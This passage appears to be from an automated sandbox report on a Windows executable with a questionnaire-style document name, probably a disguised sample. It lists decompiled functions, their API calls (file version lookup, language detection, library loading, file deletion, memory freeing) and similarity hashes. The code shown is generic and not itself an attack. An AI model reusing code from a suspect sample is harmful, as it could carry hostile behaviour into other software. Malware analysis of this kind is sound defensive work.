                                                                                              0x004af20a
                                                                                              0x004af20b
                                                                                              0x004af20c
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004af20c
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • Sleep.KERNEL32(?,?,?,?,0000000D,?,004B64EC,000000FA,00000032,004B6554), ref: 004AF1D3
                                                                                              • Sleep.KERNEL32(?,?,?,?,0000000D,?,004B64EC,000000FA,00000032,004B6554), ref: 004AF1E3
                                                                                              • GetLastError.KERNEL32(?,?,?,0000000D,?,004B64EC,000000FA,00000032,004B6554), ref: 004AF1F6
                                                                                              • GetLastError.KERNEL32(?,?,?,0000000D,?,004B64EC,000000FA,00000032,004B6554), ref: 004AF200
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLastSleep
                                                                                              • String ID:
                                                                                              • API String ID: 1458359878-0
                                                                                              • Opcode ID: 132a67e1d44d9774a6928004e5d8cee8820d44842addde93f31c36794548402b
                                                                                              • Instruction ID: c6a2870ed3ca6a3ef6dac7de38143878fdab2d33d6efdb0808b7300bb595a527
                                                                                              • Opcode Fuzzy Hash: 132a67e1d44d9774a6928004e5d8cee8820d44842addde93f31c36794548402b
                                                                                              • Instruction Fuzzy Hash: 0CF02B37B04224A76724A5EBEC46D6FE298DEB33A8710457BFC04D7302C439CC4542A8
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0041FF94, Relevance: 4.6, APIs: 3, Instructions: 93COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 63%
                                                                                              			E0041FF94(void* __eax, void* __ebx, signed int* __ecx, signed int* __edx, void* __edi, void* __esi, signed int* _a4) {
				char _v8;
				char _v9;
				int _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _t33;
				int _t43;
				int _t64;
				intOrPtr _t72;
				intOrPtr _t74;
				signed int* _t77;
				signed int* _t79;
				void* _t81;
				void* _t82;
				intOrPtr _t83;

				_t81 = _t82;
				_t83 = _t82 + 0xffffffe8;
				_v8 = 0;
				_t77 = __ecx;
				_t79 = __edx;
				_push(_t81);
				_push(0x420094);
				_push( *[fs:eax]);
				 *[fs:eax] = _t83;
				_v9 = 0;
				E00407E48( &_v8, __eax);
				E00407FB0( &_v8);
				_t33 = GetFileVersionInfoSizeW(E004084EC(_v8),  &_v16); // executed
				_t64 = _t33;
				if(_t64 == 0) {
					_pop(_t72);
					 *[fs:eax] = _t72;
					_push(0x42009b);
					return E00407A20( &_v8);
				} else {
					_v20 = E004053F0(_t64);
					_push(_t81);
					_push(0x420077);
					_push( *[fs:edx]);
					 *[fs:edx] = _t83;
					_t43 = GetFileVersionInfoW(E004084EC(_v8), _v16, _t64, _v20); // executed
					if(_t43 != 0 && VerQueryValueW(_v20, 0x4200a8,  &_v24,  &_v28) != 0) {
						 *_t79 =  *(_v24 + 0x10) >> 0x00000010 & 0x0000ffff;
						 *_t77 =  *(_v24 + 0x10) & 0x0000ffff;
						 *_a4 =  *(_v24 + 0x14) >> 0x00000010 & 0x0000ffff;
						_v9 = 1;
					}
					_pop(_t74);
					 *[fs:eax] = _t74;
					_push(0x42007e);
					return E0040540C(_v20);
				}
			}



















                                                                                              0x0041ff95
                                                                                              0x0041ff97
                                                                                              0x0041ff9f
                                                                                              0x0041ffa2
                                                                                              0x0041ffa4
                                                                                              0x0041ffaa
                                                                                              0x0041ffab
                                                                                              0x0041ffb0
                                                                                              0x0041ffb3
                                                                                              0x0041ffb6
                                                                                              0x0041ffbf
                                                                                              0x0041ffc7
                                                                                              0x0041ffd9
                                                                                              0x0041ffde
                                                                                              0x0041ffe2
                                                                                              0x00420080
                                                                                              0x00420083
                                                                                              0x00420086
                                                                                              0x00420093
                                                                                              0x0041ffe8
                                                                                              0x0041ffef
                                                                                              0x0041fff4
                                                                                              0x0041fff5
                                                                                              0x0041fffa
                                                                                              0x0041fffd
                                                                                              0x00420012
                                                                                              0x00420019
                                                                                              0x00420041
                                                                                              0x0042004a
                                                                                              0x0042005b
                                                                                              0x0042005d
                                                                                              0x0042005d
                                                                                              0x00420063
                                                                                              0x00420066
                                                                                              0x00420069
                                                                                              0x00420076
                                                                                              0x00420076

                                                                                              APIs
                                                                                              • GetFileVersionInfoSizeW.VERSION(00000000,?,00000000,00420094), ref: 0041FFD9
                                                                                              • GetFileVersionInfoW.VERSION(00000000,?,00000000,?,00000000,00420077,?,00000000,?,00000000,00420094), ref: 00420012
                                                                                              • VerQueryValueW.VERSION(?,004200A8,?,?,00000000,?,00000000,?,00000000,00420077,?,00000000,?,00000000,00420094), ref: 0042002C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileInfoVersion$QuerySizeValue
                                                                                              • String ID:
                                                                                              • API String ID: 2179348866-0
                                                                                              • Opcode ID: db1b7188df03ba7b3b32e0e3197f16d1bbb1710ebdecda22b0e2c2fca2e7d661
                                                                                              • Instruction ID: 087fa93cc02b824bee97242c1a4c1e6fbe52d07f241be95d6751b2a9bfa32856
                                                                                              • Opcode Fuzzy Hash: db1b7188df03ba7b3b32e0e3197f16d1bbb1710ebdecda22b0e2c2fca2e7d661
                                                                                              • Instruction Fuzzy Hash: 19314771A042199FD710DFA9D941DAFB7F8EB48700B91447AF944E3252D778DD00C765
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040B110, Relevance: 3.1, APIs: 2, Instructions: 93COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 72%
                                                                                              			E0040B110(intOrPtr __eax, void* __ebx, signed int __ecx, signed int __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				signed int _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				signed int _t41;
				signed short _t43;
				signed short _t46;
				signed int _t60;
				intOrPtr _t68;
				void* _t79;
				signed int* _t81;
				intOrPtr _t84;

				_t79 = __edi;
				_t61 = __ecx;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(__ebx);
				_push(__esi);
				_t81 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				E00407B04(_v8);
				E00407B04(_v12);
				_push(_t84);
				_push(0x40b227);
				_push( *[fs:eax]);
				 *[fs:eax] = _t84;
				E00407A20(__ecx);
				if(_v12 == 0) {
					L14:
					_pop(_t68);
					 *[fs:eax] = _t68;
					_push(E0040B22E);
					return E00407A80( &_v28, 6);
				}
				E00407E48( &_v20, _v12);
				_t41 = _v12;
				if(_t41 != 0) {
					_t41 =  *(_t41 - 4);
				}
				_t60 = _t41;
				if(_t60 < 1) {
					L7:
					_t43 = E0040AE34(_v8, _t60, _t61,  &_v16, _t81); // executed
					if(_v16 == 0) {
						L00403730();
						E0040A7E4(_t43, _t60,  &_v24, _t79, _t81);
						_t46 = E0040AF60(_v20, _t60, _t81, _v24, _t79, _t81); // executed
						__eflags =  *_t81;
						if( *_t81 == 0) {
							__eflags =  *0x4bdc0c;
							if( *0x4bdc0c == 0) {
								L00403738();
								E0040A7E4(_t46, _t60,  &_v28, _t79, _t81);
								E0040AF60(_v20, _t60, _t81, _v28, _t79, _t81);
							}
						}
						__eflags =  *_t81;
						if(__eflags == 0) {
							E0040B044(_v20, _t60, _t81, __eflags); // executed
						}
					} else {
						E0040AF60(_v20, _t60, _t81, _v16, _t79, _t81);
					}
					goto L14;
				}
				while( *((short*)(_v12 + _t60 * 2 - 2)) != 0x2e) {
					_t60 = _t60 - 1;
					__eflags = _t60;
					if(_t60 != 0) {
						continue;
					}
					goto L7;
				}
				_t61 = _t60;
				E004088AC(_v12, _t60, 1,  &_v20);
				goto L7;
			}

















                                                                                              0x0040b110
                                                                                              0x0040b110
                                                                                              0x0040b113
                                                                                              0x0040b115
                                                                                              0x0040b117
                                                                                              0x0040b119
                                                                                              0x0040b11b
                                                                                              0x0040b11d
                                                                                              0x0040b11f
                                                                                              0x0040b120
                                                                                              0x0040b121
                                                                                              0x0040b123
                                                                                              0x0040b126
                                                                                              0x0040b12c
                                                                                              0x0040b134
                                                                                              0x0040b13b
                                                                                              0x0040b13c
                                                                                              0x0040b141
                                                                                              0x0040b144
                                                                                              0x0040b149
                                                                                              0x0040b152
                                                                                              0x0040b20c
                                                                                              0x0040b20e
                                                                                              0x0040b211
                                                                                              0x0040b214
                                                                                              0x0040b226
                                                                                              0x0040b226
                                                                                              0x0040b15e
                                                                                              0x0040b163
                                                                                              0x0040b168
                                                                                              0x0040b16d
                                                                                              0x0040b16d
                                                                                              0x0040b16f
                                                                                              0x0040b174
                                                                                              0x0040b19b
                                                                                              0x0040b1a1
                                                                                              0x0040b1aa
                                                                                              0x0040b1bb
                                                                                              0x0040b1c3
                                                                                              0x0040b1d0
                                                                                              0x0040b1d5
                                                                                              0x0040b1d8
                                                                                              0x0040b1da
                                                                                              0x0040b1e1
                                                                                              0x0040b1e3
                                                                                              0x0040b1eb
                                                                                              0x0040b1f8
                                                                                              0x0040b1f8
                                                                                              0x0040b1e1
                                                                                              0x0040b1fd
                                                                                              0x0040b200
                                                                                              0x0040b207
                                                                                              0x0040b207
                                                                                              0x0040b1ac
                                                                                              0x0040b1b4
                                                                                              0x0040b1b4
                                                                                              0x00000000
                                                                                              0x0040b1aa
                                                                                              0x0040b176
                                                                                              0x0040b196
                                                                                              0x0040b197
                                                                                              0x0040b199
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040b199
                                                                                              0x0040b185
                                                                                              0x0040b18f
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • GetUserDefaultUILanguage.KERNEL32(00000000,0040B227,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0040B2AE,00000000,?,00000105), ref: 0040B1BB
                                                                                              • GetSystemDefaultUILanguage.KERNEL32(00000000,0040B227,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0040B2AE,00000000,?,00000105), ref: 0040B1E3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: DefaultLanguage$SystemUser
                                                                                              • String ID:
                                                                                              • API String ID: 384301227-0
                                                                                              • Opcode ID: 8091743a5a45bbad2069f173d476493d8776fa257b9783c2651a700d4e0e0a8f
                                                                                              • Instruction ID: e5bcb09f7540d0846d638ab8db7cc306f2a88a3609992180fc1e837192b0f5a6
                                                                                              • Opcode Fuzzy Hash: 8091743a5a45bbad2069f173d476493d8776fa257b9783c2651a700d4e0e0a8f
                                                                                              • Instruction Fuzzy Hash: B0313070A142499BDB10EBA5C891AAEB7B5EF48304F50857BE400B73D1DB7CAD41CB9E
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040B234, Relevance: 3.1, APIs: 2, Instructions: 55libraryCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 58%
                                                                                              			E0040B234(void* __eax, void* __ebx, void* __edi, void* __esi, void* __eflags) {
				char _v8;
				short _v530;
				char _v536;
				char _v540;
				void* _t44;
				intOrPtr _t45;
				void* _t49;
				void* _t52;

				_v536 = 0;
				_v540 = 0;
				_v8 = 0;
				_t49 = __eax;
				_push(_t52);
				_push(0x40b2ee);
				_push( *[fs:eax]);
				 *[fs:eax] = _t52 + 0xfffffde8;
				GetModuleFileNameW(0,  &_v530, 0x105);
				E00408550( &_v536, _t49);
				_push(_v536);
				E0040858C( &_v540, 0x105,  &_v530);
				_pop(_t44); // executed
				E0040B110(_v540, 0,  &_v8, _t44, __edi, _t49); // executed
				if(_v8 != 0) {
					LoadLibraryExW(E004084EC(_v8), 0, 2);
				}
				_pop(_t45);
				 *[fs:eax] = _t45;
				_push(E0040B2F5);
				E00407A80( &_v540, 2);
				return E00407A20( &_v8);
			}











                                                                                              0x0040b241
                                                                                              0x0040b247
                                                                                              0x0040b24d
                                                                                              0x0040b250
                                                                                              0x0040b254
                                                                                              0x0040b255
                                                                                              0x0040b25a
                                                                                              0x0040b25d
                                                                                              0x0040b270
                                                                                              0x0040b27d
                                                                                              0x0040b288
                                                                                              0x0040b29a
                                                                                              0x0040b2a8
                                                                                              0x0040b2a9
                                                                                              0x0040b2b2
                                                                                              0x0040b2c1
                                                                                              0x0040b2c6
                                                                                              0x0040b2ca
                                                                                              0x0040b2cd
                                                                                              0x0040b2d0
                                                                                              0x0040b2e0
                                                                                              0x0040b2ed

                                                                                              APIs
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040B2EE,?,?,00000000), ref: 0040B270
                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,0040B2EE,?,?,00000000), ref: 0040B2C1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileLibraryLoadModuleName
                                                                                              • String ID:
                                                                                              • API String ID: 1159719554-0
                                                                                              • Opcode ID: c89eb0a175d0b8486c29a163bc28afc1dff8206c8c77fc3926f93841ada109dc
                                                                                              • Instruction ID: c66d7809fa1512833e1e01641763b0ecb7dd00f0751393a0e64d94d028879d96
                                                                                              • Opcode Fuzzy Hash: c89eb0a175d0b8486c29a163bc28afc1dff8206c8c77fc3926f93841ada109dc
                                                                                              • Instruction Fuzzy Hash: 35116070A4421CABDB10EB55CD86BDE77B8DB04304F5144BEE508B32C1DA785F848AA9
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00427154, Relevance: 3.0, APIs: 2, Instructions: 42fileCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 60%
                                                                                              			E00427154(void* __eax, void* __edx, void* __eflags) {
				int _v8;
				char _v16;
				long _v20;
				int _t13;
				intOrPtr _t27;
				void* _t32;
				void* _t34;
				intOrPtr _t35;

				_t32 = _t34;
				_t35 = _t34 + 0xfffffff0;
				if(E00427108(__eax,  &_v16) != 0) {
					_push(_t32);
					_push(0x4271b1);
					_push( *[fs:eax]);
					 *[fs:eax] = _t35;
					_t13 = DeleteFileW(E004084EC(__edx)); // executed
					_v8 = _t13;
					_v20 = GetLastError();
					_pop(_t27);
					 *[fs:eax] = _t27;
					_push(E004271B8);
					return E00427144( &_v16);
				} else {
					_v8 = 0;
					return _v8;
				}
			}











                                                                                              0x00427155
                                                                                              0x00427157
                                                                                              0x0042716c
                                                                                              0x00427177
                                                                                              0x00427178
                                                                                              0x0042717d
                                                                                              0x00427180
                                                                                              0x0042718b
                                                                                              0x00427190
                                                                                              0x00427198
                                                                                              0x0042719d
                                                                                              0x004271a0
                                                                                              0x004271a3
                                                                                              0x004271b0
                                                                                              0x0042716e
                                                                                              0x00427170
                                                                                              0x004271c9
                                                                                              0x004271c9

                                                                                              APIs
                                                                                              • DeleteFileW.KERNEL32(00000000,00000000,004271B1,?,0000000D,00000000), ref: 0042718B
                                                                                              • GetLastError.KERNEL32(00000000,00000000,004271B1,?,0000000D,00000000), ref: 00427193
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: DeleteErrorFileLast
                                                                                              • String ID:
                                                                                              • API String ID: 2018770650-0
                                                                                              • Opcode ID: 6bce5fda464dbdacec63520f594f5bcb5d9fb2b97579abb83185b4526990ec2d
                                                                                              • Instruction ID: b2b9a58b343adce66678156e8009272800f6ed28378062f2bcdc1a6b1bb3db77
                                                                                              • Opcode Fuzzy Hash: 6bce5fda464dbdacec63520f594f5bcb5d9fb2b97579abb83185b4526990ec2d
                                                                                              • Instruction Fuzzy Hash: 7AF0C831B08228ABDB01EFB5AC424AEB7E8DF0971479149BBE804E3341E6395D209698
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00421230, Relevance: 3.0, APIs: 2, Instructions: 33libraryCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 37%
                                                                                              			E00421230(void* __eax, void* __ebx, int __edx) {
				struct HINSTANCE__* _v12;
				int _v16;
				int _t4;
				struct HINSTANCE__* _t9;
				void* _t12;
				intOrPtr _t16;
				void* _t18;
				void* _t19;
				intOrPtr _t20;

				_t18 = _t19;
				_t20 = _t19 + 0xfffffff4;
				_t12 = __eax;
				_t4 = SetErrorMode(__edx); // executed
				_v16 = _t4;
				_push(_t18);
				_push(0x4212a2);
				_push( *[fs:eax]);
				 *[fs:eax] = _t20;
				asm("fnstcw word [ebp-0x2]");
				_push(_t18);
				_push(0x421284);
				_push( *[fs:eax]);
				 *[fs:eax] = _t20;
				_t9 = LoadLibraryW(E004084EC(_t12)); // executed
				_v12 = _t9;
				_pop(_t16);
				 *[fs:eax] = _t16;
				_push(0x42128b);
				asm("fclex");
				asm("fldcw word [ebp-0x2]");
				return 0;
			}












                                                                                              0x00421231
                                                                                              0x00421233
                                                                                              0x00421237
                                                                                              0x0042123a
                                                                                              0x0042123f
                                                                                              0x00421244
                                                                                              0x00421245
                                                                                              0x0042124a
                                                                                              0x0042124d
                                                                                              0x00421250
                                                                                              0x00421255
                                                                                              0x00421256
                                                                                              0x0042125b
                                                                                              0x0042125e
                                                                                              0x00421269
                                                                                              0x0042126e
                                                                                              0x00421273
                                                                                              0x00421276
                                                                                              0x00421279
                                                                                              0x0042127e
                                                                                              0x00421280
                                                                                              0x00421283

                                                                                              APIs
                                                                                              • SetErrorMode.KERNEL32 ref: 0042123A
                                                                                              • LoadLibraryW.KERNEL32(00000000,00000000,00421284,?,00000000,004212A2), ref: 00421269
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLibraryLoadMode
                                                                                              • String ID:
                                                                                              • API String ID: 2987862817-0
                                                                                              • Opcode ID: 5d62b3fe4766baadd73c675683546c7f58e01c4ce11fe1a914dda1a55ed8f36c
                                                                                              • Instruction ID: 4174928c950a8c4d8a753a2a73b5e5f46ee32f9a8ef6f103d2b3a03bcfaff51e
                                                                                              • Opcode Fuzzy Hash: 5d62b3fe4766baadd73c675683546c7f58e01c4ce11fe1a914dda1a55ed8f36c
                                                                                              • Instruction Fuzzy Hash: 15F08270A14744BFDB115F779C5282BBAACE709B047A348BAF800F2691E53C48208574
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004052D4, Relevance: 2.6, APIs: 2, Instructions: 63COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E004052D4() {
				intOrPtr _t13;
				intOrPtr* _t14;
				int _t18;
				intOrPtr* _t23;
				void* _t25;
				void* _t26;
				void* _t28;
				void* _t31;

				_t28 =  *0x004BBADC;
				while(_t28 != 0x4bbad8) {
					_t2 = _t28 + 4; // 0x4bbad8
					VirtualFree(_t28, 0, 0x8000); // executed
					_t28 =  *_t2;
				}
				_t25 = 0x37;
				_t13 = 0x4b7080;
				do {
					 *((intOrPtr*)(_t13 + 0xc)) = _t13;
					 *((intOrPtr*)(_t13 + 8)) = _t13;
					 *((intOrPtr*)(_t13 + 0x10)) = 1;
					 *((intOrPtr*)(_t13 + 0x14)) = 0;
					_t13 = _t13 + 0x20;
					_t25 = _t25 - 1;
				} while (_t25 != 0);
				 *0x4bbad8 = 0x4bbad8;
				 *0x004BBADC = 0x4bbad8;
				_t26 = 0x400;
				_t23 = 0x4bbb78;
				do {
					_t14 = _t23;
					 *_t14 = _t14;
					_t8 = _t14 + 4; // 0x4bbb78
					 *_t8 = _t14;
					_t23 = _t23 + 8;
					_t26 = _t26 - 1;
				} while (_t26 != 0);
				 *0x4bbaf4 = 0;
				E00405884(0x4bbaf8, 0x80);
				_t18 = 0;
				 *0x4bbaf0 = 0;
				_t31 =  *0x004BDB80;
				while(_t31 != 0x4bdb7c) {
					_t10 = _t31 + 4; // 0x4bdb7c
					_t18 = VirtualFree(_t31, 0, 0x8000);
					_t31 =  *_t10;
				}
				 *0x4bdb7c = 0x4bdb7c;
				 *0x004BDB80 = 0x4bdb7c;
				return _t18;
			}











                                                                                              0x004052e2
                                                                                              0x004052f9
                                                                                              0x004052e7
                                                                                              0x004052f2
                                                                                              0x004052f7
                                                                                              0x004052f7
                                                                                              0x004052fd
                                                                                              0x00405302
                                                                                              0x00405307
                                                                                              0x00405309
                                                                                              0x0040530e
                                                                                              0x00405311
                                                                                              0x0040531a
                                                                                              0x0040531d
                                                                                              0x00405320
                                                                                              0x00405320
                                                                                              0x00405323
                                                                                              0x00405325
                                                                                              0x00405328
                                                                                              0x0040532d
                                                                                              0x00405332
                                                                                              0x00405332
                                                                                              0x00405334
                                                                                              0x00405336
                                                                                              0x00405336
                                                                                              0x00405339
                                                                                              0x0040533c
                                                                                              0x0040533c
                                                                                              0x00405341
                                                                                              0x00405352
                                                                                              0x00405357
                                                                                              0x00405359
                                                                                              0x0040535e
                                                                                              0x00405375
                                                                                              0x00405363
                                                                                              0x0040536e
                                                                                              0x00405373
                                                                                              0x00405373
                                                                                              0x00405379
                                                                                              0x0040537b
                                                                                              0x00405382

                                                                                              APIs
                                                                                              • VirtualFree.KERNEL32(004BBAD8,00000000,00008000,?,?,?,?,004053D4,0040CB76,00000000,0040CB94), ref: 004052F2
                                                                                              • VirtualFree.KERNEL32(004BDB7C,00000000,00008000,004BBAD8,00000000,00008000,?,?,?,?,004053D4,0040CB76,00000000,0040CB94), ref: 0040536E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: FreeVirtual
                                                                                              • String ID:
                                                                                              • API String ID: 1263568516-0
                                                                                              • Opcode ID: 2ac254642d4a9788115c799da738c06d3b344f11962515fad3d8dec7c1c1ac76
                                                                                              • Instruction ID: 8dfda0fc8014d777c4f42bdf36328f4fb77b4e1ecbcf9529c7d2d9386e1eba40
                                                                                              • Opcode Fuzzy Hash: 2ac254642d4a9788115c799da738c06d3b344f11962515fad3d8dec7c1c1ac76
                                                                                              • Instruction Fuzzy Hash: A5116D71A046008FC7689F199840B67BBE4EB88754F15C0BFE549EB791D7B8AC018F9C
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004232EC, Relevance: 1.5, APIs: 1, Instructions: 28windowCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E004232EC(long __eax, void* __edx) {
				short _v2052;
				signed int _t7;
				void* _t10;
				signed int _t16;
				void* _t17;

				_t10 = __edx;
				_t7 = FormatMessageW(0x3200, 0, __eax, 0,  &_v2052, 0x400, 0); // executed
				while(_t7 > 0) {
					_t16 =  *(_t17 + _t7 * 2 - 2) & 0x0000ffff;
					if(_t16 <= 0x20) {
						L1:
						_t7 = _t7 - 1;
						__eflags = _t7;
						continue;
					} else {
						_t20 = _t16 - 0x2e;
						if(_t16 == 0x2e) {
							goto L1;
						}
					}
					break;
				}
				return E00407BA8(_t10, _t7, _t17, _t20);
			}








                                                                                              0x004232f3
                                                                                              0x0042330b
                                                                                              0x00423313
                                                                                              0x00423317
                                                                                              0x00423320
                                                                                              0x00423312
                                                                                              0x00423312
                                                                                              0x00423312
                                                                                              0x00000000
                                                                                              0x00423322
                                                                                              0x00423322
                                                                                              0x00423326
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00423326
                                                                                              0x00000000
                                                                                              0x00423320
                                                                                              0x00423339

                                                                                              APIs
                                                                                              • FormatMessageW.KERNEL32(00003200,00000000,00000000,00000000,?,00000400,00000000,00000000,00423C1E,00000000,00423C6F,?,00423E28), ref: 0042330B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: FormatMessage
                                                                                              • String ID:
                                                                                              • API String ID: 1306739567-0
                                                                                              • Opcode ID: 8c28d4cd2feba8420b72e2c8323dac74420019247290cbce7f55a68a80108edc
                                                                                              • Instruction ID: 75fedbff241bec6efc8727d26b236f8c34027f11b3bdd8370f626a5f6d270aaf
